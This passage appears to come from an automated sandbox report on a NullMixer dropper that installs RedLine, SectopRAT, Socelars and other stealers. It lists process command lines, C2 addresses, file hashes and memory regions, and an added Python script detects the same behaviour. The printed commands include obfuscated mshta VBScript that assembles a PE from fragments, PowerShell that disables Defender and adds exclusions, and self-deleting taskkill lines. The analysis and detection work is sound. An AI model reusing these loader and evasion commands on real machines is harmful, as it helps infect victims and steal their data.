"C:\Windows\System32\cmd.exe" /Q /c cOpY /y "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" H2LAVMGsZFX.EXe && sTArt H2LaVMGSzFX.eXE /paMxRK9ViV3PT5Jnz5&if "/paMxRK9ViV3PT5Jnz5" == "" for %z in ( "C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe" ) do taskkill -Im "%~nXz" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCRIpt: cLosE ( CREAteobjEcT ( "WscRiPt.SHeLl" ). rUN ("C:\Windows\system32\cmd.exe /Q /r eCho NqN%TIME%> FvfG42h.8 & echo | Set /P = ""MZ"" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 + FDKD47Ef.I1 + U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM " , 0 ,True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eCHO "

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /Q /r eCho NqN%TIME%> FvfG42h.8& echo | Set /P = "MZ" > IiKZCUV.MQ & CoPY /Y /b iIKZCUV.MQ + 6H87pFZ.4 +FDKD47Ef.I1+ U56d.R + JB946RB.I7A + Q_tW.pL + BTDIJ1.FYL + FVfg42H.8 XHnbBPN.0kM & StArT msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"

C:\Windows\SysWOW64\control.exe

control .\R6f7sE.I

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>IiKZCUV.MQ"

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe /y .\xHnBBPN.0kM

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 440

C:\Windows\system32\RunDll32.exe

C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I
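
Several of the command lines above are the point of this sample for a defender: Set-MpPreference and Add-MpPreference turn off real-time protection and cloud reporting and exclude %TEMP%; mshta runs inline VBScript that copies a dropped EXE under a random name and kills the original; `echo | set /p = "MZ"` followed by `copy /b` stitches a PE out of fragments with harmless-looking extensions; and control.exe, rundll32 Shell32.dll,Control_RunDLL (ordinal #44) and msiexec /y then load the result as a DLL. The Python below, an added example and not tooling from the report, runs a small set of command-line rules over events in the (image, command line) form of the Processes list. The event list is constructed from the lines above plus one benign Control Panel launch as a negative control; the rule names are this example's own.

```python
import re

# Constructed input: (image, command line) pairs copied from the Processes
# list above, plus one benign Control Panel launch as a negative control.
SAMPLE_EVENTS = [
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable'),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"'),
    (r"C:\Windows\SysWOW64\mshta.exe",
     r'"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew" , 0 , tRUe) )'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I'),
    (r"C:\Windows\SysWOW64\rundll32.exe",
     r'"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I'),
    (r"C:\Windows\SysWOW64\msiexec.exe",
     r'msiexec.exe /y .\xHnBBPN.0kM'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat0675f75df01bdb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe" & exit'),
    # Benign control: a real Control Panel applet must not fire any rule.
    (r"C:\Windows\System32\rundll32.exe",
     r'"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL C:\Windows\System32\inetcpl.cpl'),
]

# Each rule is (name, compiled pattern). Matching is case-insensitive because
# the sample randomises letter case ("VbsCRiPT", "CoPY /b /Y"); the one
# exception is "MZ", which only forms a PE header in upper case.
RULES = [
    ("defender_realtime_disabled",
     re.compile(r"set-mppreference\b.*-disablerealtimemonitoring\s+(\$true|1)\b", re.I)),
    ("defender_cloud_reporting_off",
     re.compile(r"set-mppreference\b.*(-mapsreporting\s+(disable|0)|-submitsamplesconsent\s+(neversend|2))\b", re.I)),
    ("defender_exclusion_added",
     re.compile(r"add-mppreference\b.*-exclusion(path|process|extension)\b", re.I)),
    ("mshta_inline_script",
     re.compile(r'mshta(\.exe)?"?\s+(vbscript|javascript):', re.I)),
    ("pe_header_forged_by_echo_set_p",
     re.compile(r'set\s*/p\s*=\s*"?(?-i:MZ)"?\s*>', re.I)),
    ("pe_assembled_with_copy_b",
     re.compile(r"\bcopy\b[^&|]*?/b\b[^&|]*\+", re.I)),
    ("msiexec_dllregisterserver",
     re.compile(r'msiexec(\.exe)?"?\s+/[yz]\s+\S+', re.I)),
    ("taskkill_then_erase_self",
     re.compile(r"taskkill\b.*&\s*(erase|del)\b", re.I)),
]

# control.exe, Shell32!Control_RunDLL and its ordinal #44 all load the named
# file as a Control Panel applet, i.e. as a DLL. Anything that is not a .cpl
# is worth a look; the report's own case is the ".I" file R6f7sE.I.
CONTROL_TARGET_RE = re.compile(
    r'(?:control_rundll|shell32\.dll"?,\s*#44|(?:^|[\s&"])control(?:\.exe"?)?)\s+(\S+)', re.I)


def control_panel_non_cpl(cmdline):
    """Targets handed to a Control Panel loader that are not .cpl files."""
    hits = []
    for m in CONTROL_TARGET_RE.finditer(cmdline):
        target = m.group(1).strip('"')
        if not target.lower().endswith(".cpl"):
            hits.append(target)
    return hits


def scan(events):
    """Return one {"image", "rules"} dict per event, rules in RULES order."""
    results = []
    for image, cmdline in events:
        fired = [name for name, pat in RULES if pat.search(cmdline)]
        if control_panel_non_cpl(cmdline):
            fired.append("control_panel_loads_non_cpl")
        results.append({"image": image, "rules": fired})
    return results


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(f"{r['image']}: {', '.join(r['rules']) or '-'}")
```

The rules key on the operation, not on the randomised file names, so they survive the per-run renaming seen between 09xU.exE and H2LAVMGsZFX.EXe. The Defender rules are the ones to alert on first: once the %TEMP% exclusion and the MAPS/sample-submission opt-out are in place, every later stage in this tree runs unscanned and unreported.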

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 gazrxlog.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 whealclothing.xyz udp
US 8.8.8.8:53 my-all-group.bar udp
US 8.8.8.8:53 m525-blockchain31432.bar udp
FR 91.121.67.60:23325 tcp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 91.121.67.60:23325 tcp
N/A 127.0.0.1:49275 tcp
N/A 127.0.0.1:49277 tcp
FR 91.121.67.60:23325 tcp
FR 91.121.67.60:23325 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:23325 tcp
US 72.84.118.132:8080 tcp
FR 91.121.67.60:23325 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 c93901703b1d556d494f7a31ffb04720
SHA1 d14e2dc239ac85e6020f1fc4c035f7d2ea72d262
SHA256 0d5b2226f4199a3891ec836c5b54023595b4aa06d4a80e816a8d6545a0bb3631
SHA512 3e31e881d7b7c74baa5ea0e8d97f86dfc6feb06ec7061f30891b7736477f2888fdb58ccaa4d8ea764249191c89e5897954515b6bfdfe6a45d51640c63c20e900

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\setup_install.exe

MD5 a979670adefae9ab376382f3229f3f28
SHA1 5b5b75a789e46a2f8ac02fba3d895fa968387c9b
SHA256 a8ae45e63487b6dd93bf61429d996be4abc922785e893717cdecd84b0b6f2040
SHA512 f023b21556d5ba5cd747f02ccc99ee1a27fea1d1c675615efa31664301b53dacb253f1b92356a8aea7ab0eba77e89d0fea7d0ba088bc17599fe55278e0fb744b

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

memory/2796-76-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat06ebc37d1c94352.exe

MD5 e9133ca1a95483a3331d0f336685302d
SHA1 48c1348e20b26be8227ed63a1db0f13716f1b8e3
SHA256 1145ee6af1fb495cb10eda71b3377e5ff6a21224c613f598c1c736fb6eaac58b
SHA512 009c74131d2fa256e55a4735eee2b498a673a7857635e78f12e442b27025a99562356ccb8db15c4119e6b2ff477a07f85db8290f58f4821626bae0f729b61f57

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0663b341399ee.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat062000ca9aa6.exe

MD5 1cc8a64b178076dca421fedc3a248a56
SHA1 db8ed444965577dfb6db4f92ddd8d96a157ddea5
SHA256 1f7a19b62d2e0dfddefe2d8e829bd1af457806d61bc650aa9e3ed340a0886345
SHA512 c77b3c1ca13b18b6335b93106c285c4c9fdade11e0d1ab022cb4465228b2d8a0325a930e1b371e66973e36188fac023ae96eac0ff9921d63dc9734a38deb07ff

memory/3000-127-0x0000000000400000-0x000000000089B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\H2LAVMGsZFX.EXe

MD5 0e05650d436fd4d92775cd4f65973870
SHA1 4d13aaa6b18630d0c89400cee5933130f03bd762
SHA256 42c9a8d4eba1a23988476036c02318b3452e3ba835cb08786771ba63f6803b16
SHA512 6cf7a676cc7d5114293add15dd8fe029ef7e145183ac550600e7c0c85be33e0b2c42f0456838807971c4e122599a7d42fc33f44ca606cf24fbaaf8b43196ac08

memory/2620-164-0x00000000021B0000-0x00000000022FC000-memory.dmp

memory/556-165-0x0000000002540000-0x0000000002742000-memory.dmp

memory/2780-178-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-176-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-175-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-174-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2780-172-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-170-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-168-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2780-166-0x0000000000400000-0x0000000000420000-memory.dmp

memory/2796-179-0x0000000000400000-0x000000000051B000-memory.dmp

memory/2796-187-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-186-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-185-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2796-183-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2796-180-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2620-188-0x0000000002E40000-0x0000000002EE5000-memory.dmp

memory/2620-192-0x0000000002EF0000-0x0000000002F82000-memory.dmp

memory/2620-189-0x0000000002EF0000-0x0000000002F82000-memory.dmp

memory/556-193-0x0000000002CF0000-0x0000000002D95000-memory.dmp

memory/556-197-0x0000000002DA0000-0x0000000002E32000-memory.dmp

memory/556-194-0x0000000002DA0000-0x0000000002E32000-memory.dmp

memory/2944-129-0x00000000003C0000-0x00000000003C6000-memory.dmp

memory/344-128-0x0000000001360000-0x00000000013C8000-memory.dmp

memory/2824-198-0x0000000000400000-0x0000000000883000-memory.dmp

memory/556-200-0x0000000002540000-0x0000000002742000-memory.dmp

memory/2620-199-0x00000000021B0000-0x00000000022FC000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0619212f22dd7.exe

MD5 854ea0bc0602795b95da3be8257c530f
SHA1 f243a71edc902ed91d0f990630a73d0d01828c73
SHA256 c01e2d31948bc4de2df55929062171e7dbc85b84ee764b799520d6f0740e1e1e
SHA512 2a2b55cdbc3d62fc26af219d88b31f87782a8a550d273997d6d383a877c85529c8f0c7983c77ef4f176a2ce32119fd8733658aeb86de9215629c0e6012ce544c

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0618d93ac2c5c.exe

MD5 b4c503088928eef0e973a269f66a0dd2
SHA1 eb7f418b03aa9f21275de0393fcbf0d03b9719d5
SHA256 2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
SHA512 c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465

memory/2944-115-0x0000000001220000-0x000000000123A000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0675f75df01bdb.exe

MD5 dd2fdd69b9db1cf5764dcfd429a1cf5e
SHA1 c45f13f1e2d166ff7ea70786d51b2fdd3bdea2e8
SHA256 d22db6b8e674124371143c301994af4326668dbdfe3dcdc5fdd949d066057afe
SHA512 c4aa0a831701e0ac9ca5bf7da6d46cd1a02d44248a2a4e85a3c79205182d245490245bdd90a357def492bb984249987097af70aed71331c12f8e238b10f2b60d

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat0647140c100d63.exe

MD5 10e13cc7b41d162ab578256f27d297b1
SHA1 1d938b7e6e99951d9b8139f078483539120021e6
SHA256 7c91657c83118c91043fcdb9d616fbf219acc7ea7d793e3276e8ee801d1576c9
SHA512 22769c54259f0f82eed0f6d8d8c0d0040acf276baab8e75ed7832c771f1544939918ada9d1bc386acca0db84a0291f5932fff0f5d131e1127aff87811353e3cd

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NVX9Z8PTS0WU4CI6G0TB.temp

MD5 e1fe0785abfdaf20ec9f62376f97c2a3
SHA1 b01626c55df5f089fc64b30e383f3b90a22d345d
SHA256 8c5508a1706c3350159b72bd67e400b16fda92a40fc72ac86a27602adede39f7
SHA512 a2da6235209820148667b37564a16ad23ff22acd586d51c9512346fa9f6a5f9d1a6d9ace350b3c73021f2886c7745d26670eadd84b24276c90cbaba898355b68

C:\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\Sat060fd7e42d2.exe

MD5 29c9683aa48f1e3a29168f6b0ff3be04
SHA1 f2fde0bb1404e724387c4a4445d3e7c2c07d8d3f
SHA256 e46b9e2dd407bf942a3d19b75277ae6893a0b6c87e2df9d6047a9b35ebc53901
SHA512 a7092b9e781512a6f8f2fdcefb45cfb026a6e1f8762b06c0e969c8d52389d22e3d111ae67ba82bf49ad462953091def927ba911eb7dabee061f68d4aacde9891

memory/2796-77-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2796-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-72-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2796-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-69-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-68-0x000000006FE40000-0x000000006FFC6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2796-60-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2796-57-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS0B6A72A6\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

memory/556-206-0x0000000002DA0000-0x0000000002E32000-memory.dmp

memory/2620-209-0x0000000002EF0000-0x0000000002F82000-memory.dmp

memory/2620-210-0x0000000002F90000-0x0000000003CD1000-memory.dmp

memory/2620-211-0x00000000008F0000-0x000000000097B000-memory.dmp

memory/2620-212-0x0000000000D10000-0x0000000000D97000-memory.dmp

memory/2708-215-0x0000000002850000-0x000000000299C000-memory.dmp

memory/2708-217-0x0000000002850000-0x000000000299C000-memory.dmp

memory/2708-219-0x0000000002DF0000-0x0000000002E95000-memory.dmp

memory/2708-220-0x0000000002EA0000-0x0000000002F32000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c78ded4d176ac.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19b4ef3b53293fe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1969586bcbf58493.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue193858933525b62.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c06f159e0ec.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue192762f1cd058ddf8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-6C6DU.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19879c4c0e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-CFL7R.tmp\Tue19879c4c0e.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue195c40958f528163.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19761b3b8d9d.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4d27dca0a1e05e876c2a1a8c09854c847b8e21bc5db294ad63cbfc603b5d62ef.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19411ac950924ec3f.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19c1338f41ab.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue1993b3f72c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19325eb008c0b950.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19f51bcd77a.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE83F5E6\Tue19150ee2be694c8a4.exe N/A
